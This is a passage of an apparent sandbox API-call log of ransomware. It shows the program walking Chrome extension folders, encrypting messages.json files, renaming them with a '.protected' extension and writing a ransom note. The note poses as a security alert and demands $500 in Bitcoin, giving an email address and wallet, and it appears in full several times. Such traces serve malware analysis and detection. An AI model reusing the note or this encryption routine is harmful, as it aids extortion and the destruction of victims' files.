pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\RESTORE_FILES.txt") returned 160 [0079.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.598] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.598] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.599] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.599] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.599] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.599] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.599] CloseHandle (hObject=0x164) returned 1 [0079.599] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0079.599] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0079.599] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th") returned 142 [0079.599] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0079.599] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0079.599] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*") returned 144 [0079.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.600] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.600] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.600] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.600] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.600] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.600] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\.") returned 144 [0079.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.600] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.600] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.600] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.600] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.600] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.600] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\..") returned 145 [0079.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.600] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.600] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.600] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.600] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.600] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.601] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.601] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.601] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.601] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x164, lpOverlapped=0x0) returned 1 [0079.607] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.607] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x164, lpOverlapped=0x0) returned 1 [0079.607] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.607] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.607] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.608] CloseHandle (hObject=0x168) returned 1 [0079.608] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.protected") returned 166 [0079.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.protected")) returned 1 [0079.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.608] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.608] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\RESTORE_FILES.txt") returned 160 [0079.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.609] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.609] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.610] lstrlenA (lpString="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") returned 684 [0079.610] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.610] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.610] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.610] CloseHandle (hObject=0x164) returned 1 [0079.610] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0079.610] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr") returned 142 [0079.610] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0079.610] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0079.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*") returned 144 [0079.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.610] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\.") returned 144 [0079.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.611] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.611] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\..") returned 145 [0079.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.611] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0079.611] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.611] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.611] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.611] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0079.612] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.612] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0079.613] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.613] CloseHandle (hObject=0x168) returned 1 [0079.613] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.protected") returned 166 [0079.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.protected")) returned 1 [0079.616] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.616] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.616] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\RESTORE_FILES.txt") returned 160 [0079.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.617] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: 